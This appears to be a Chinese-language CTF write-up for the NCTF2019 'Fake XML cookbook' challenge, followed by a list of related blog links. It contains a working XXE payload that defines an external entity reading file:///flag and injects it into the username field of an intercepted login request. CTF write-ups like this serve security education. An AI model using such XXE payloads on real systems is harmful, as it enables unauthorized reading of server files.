[NCTF2019]Fake XML cookbook1

打开题目

猜测可能为sql注入,或者绕过,思路查看源码,看有用信息

试输入发现只会返回用户名错误,根据提示XML相对XXE攻击

首先进行抓包,然后构造payload。

复制代码
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///flag">
  ]>
<user><username>&admin;</username><password>123456</password></user>

直接就可以得到flag

相关推荐
GoodStudyAndDayDayUp11 小时前
IDEA能够从mapper跳转到xml的插件
xml·java·intellij-idea
见欢.12 小时前
XXE靶场
xml
云和数据.ChenGuang1 天前
《XML》教案 第1章 学习XML基础
xml·java·学习
王·小白攻城狮·不是那么帅的哥·天文1 天前
Java操作Xml
xml·java
xiao_fwuu2 天前
IDEA 打开 maven 的 settings.xml 文件
xml·maven·intellij-idea
星月前端3 天前
随记:springboot的xml中sql数据库表名动态写法
xml·数据库·spring boot
有点困的拿铁4 天前
Spring篇--xml方式整合第三方框架
xml·java·spring
武子康4 天前
Java-30 深入浅出 Spring - IoC 基础 启动IoC 纯XML启动 Bean、DI注入
xml·java·开发语言·后端·spring·mybatis·springboot
武子康4 天前
Java-29 深入浅出 Spring - IoC 基础 启动IoC容器的方式 Java方式与Web(XML、配置)方式
xml·java·大数据·开发语言·spring boot·spring
网络安全-杰克5 天前
Apache solr XML 实体注入漏洞
xml·apache·solr